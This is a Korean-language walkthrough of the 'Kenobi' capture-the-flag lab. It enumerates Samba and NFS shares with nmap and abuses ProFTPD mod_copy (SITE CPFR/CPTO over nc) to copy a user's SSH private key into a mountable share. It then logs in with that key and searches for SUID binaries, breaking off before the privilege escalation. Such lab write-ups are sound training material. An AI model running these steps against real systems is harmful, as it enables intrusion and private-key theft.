kenobi
#
Linux 시스템 악용에 대한 연습. 공유를 위해 Samba를 열거하고 취약한 버전의 proftpd를 조작하고 경로 변수 조작으로 권한을 확대하십시오.
![image](https://user-images.githubusercontent.com/61821641/148241770-b133487c-15ec-42d4-8d1d-3d23081fbe60.png)
![image](https://user-images.githubusercontent.com/61821641/148242110-b5868349-503e-4dae-b05c-f88252067da0.png)
#
1. Samba 열거

```
nmap -p PORT --script=smb-enum-shares.nse,smb-enum-users.nse MACHINE_IP
```
![image](https://user-images.githubusercontent.com/61821641/148242036-6d7a0066-7d46-4c7d-ae39-950511df01d7.png)
![image](https://user-images.githubusercontent.com/61821641/148244068-5c6f898b-033d-4447-8d12-a9c9b7a97b4d.png)

2. smbclient

```
smbclient //<ip>/anonymous
```
![image](https://user-images.githubusercontent.com/61821641/148243648-e457f200-c2b1-4da8-b4d8-8a173eae7cf8.png)
smb 나와서 `smbget -R smb://10.10.94.232/anonymous`를 수행하는 거랑 get이랑 같은 결과(download log.txt)

3. rpc

이전 nmap 포트 스캔에서 rpcbind 서비스를 실행하는 포트 111을 표시했을 것이다. 이것은 원격 프로시저 호출(RPC) 프로그램 번호를 범용 주소로 변환하는 서버일 뿐. RPC 서비스가 시작되면 rpcbind에게 수신 대기 중인 주소와 제공할 준비가 된 RPC 프로그램 번호를 알려준다. 

이 경우 포트 111은 네트워크 파일 시스템에 대한 액세스다. 이것을 열거하기 위해 nmap을 사용하자.
```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount MACHINE_IP
```

![image](https://user-images.githubusercontent.com/61821641/148243463-e7d25cc8-8e34-4b7b-8136-342eb80d2886.png)
#
1. ProFtpd

ProFtpd는 Unix, Windows 시스템과 호환 되는 무료 오픈 소스 FTP 서버다. 과거 소프트웨어 버전에서도 취약했다.

searchsploit을 사용하여 특정 소프트웨어 버전에 대한 익스플로잇을 찾을 수 있다.

Searchsploit은 기본적으로 exploit-db.com을 위한 명령줄 검색 도구다.
![image](https://user-images.githubusercontent.com/61821641/148245897-c48bf7b8-8f06-4a63-af75-edddb8678643.png)

2. mod_copy
mod_copy 모듈 은 서버의 한 위치에서 다른 위치로 파일/디렉토리를 복사하는 데 사용할 수 있는 SITE CPFR 및 SITE CPTO 명령을 구현 한다. 인증되지 않은 클라이언트는 이러한 명령을 활용 하여 파일 시스템의 모든 부분에서 선택한 대상으로 파일을 복사할 수 있다.

우리는 FTP 서비스가 Kenobi 사용자(공유의 파일에서)로 실행 중이고 해당 사용자에 대해 ssh 키가 생성된다는 것을 알고 있다.
```
nc MACHINE)IP 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
```
SITE CPFR 및 SITE CPTO 명령을 사용하여 Kenobi의 개인 키를 복사한다. /var 디렉토리가 우리가 볼 수 있는 마운트라는 정보를 얻었기 때문에 Kenobi의 개인 키를 /var/tmp 디렉토리로 옮겼다.
![image](https://user-images.githubusercontent.com/61821641/148250828-b9816d79-e3d0-44a0-9e95-dd9ae5fcfbdb.png)

3. 

/var/tmp를 local에 마운트
```
mkdir /mnt/kenobiNFS
mount 10.10.94.232:/var /mnt/kenobiNFS
```
![image](https://user-images.githubusercontent.com/61821641/148251821-e8e51d64-d1e6-4283-a618-221665f2d372.png)


key 복사한 다음 권한부여하고 ssh접속

```
┌──(root💀kali)-[/]
└─# cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(root💀kali)-[/]
└─# chmod 600 id_rsa                                                                                                                                                                                                                   130 ⨯
                                                                                                                                                                                                                                             
┌──(root💀kali)-[/]
└─# ssh -i id_rsa kenobi@10.10.94.232
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ 
```
#
SUID, SGID, 고정 비트
![image](https://user-images.githubusercontent.com/61821641/148253428-93aedc8c-ed40-4196-a472-a7b56d331671.png)

| **Permission** | **On Files** | **On Directories** |
| --- | --- | --- |
| SUID Bit | 사용자는 파일 소유자의 권한으로 파일을 실행 | \- |
| SGID Bit | 사용자는 그룹 소유자 의 권한으로 파일을 실행 | 디렉토리에 생성된 파일은 동일한 그룹 소유자를 가진다. |
| Sticky Bit | No meaning | 사용자는 다른 사용자의 파일을 삭제할 수 없다. |


SUID 비트는 위험할 수 있다. passwd와 같은 일부 바이너리는 높은 권한으로 실행해야 하지만(시스템에서 비밀번호 재설정으로) SUID 비트가 있는 다른 사용자 지정 파일은 모든 종류의 문제를 유발할 수 있다.

다음을 실행하여 시스템에서 이러한 유형의 파일을 검색할 수 있다.
```
find / -perm -u=s -type f 2>/dev/null
```
![image](https://user-images.githubusercontent.com/61821641/148253486-2b075ca4-a6b8-4419-94cf-f48ec5ddee99.png)

/usr/bin/menu를 바이너리로 실행
![image](https://user-images.githubusercontent.com/61821641/148254582-e267d472-9115-4aa2-b486-6a4dab882ce4.png)
#
reference
- [proftpd mod_copy](http://www.proftpd.org/docs/contrib/mod_copy.html)
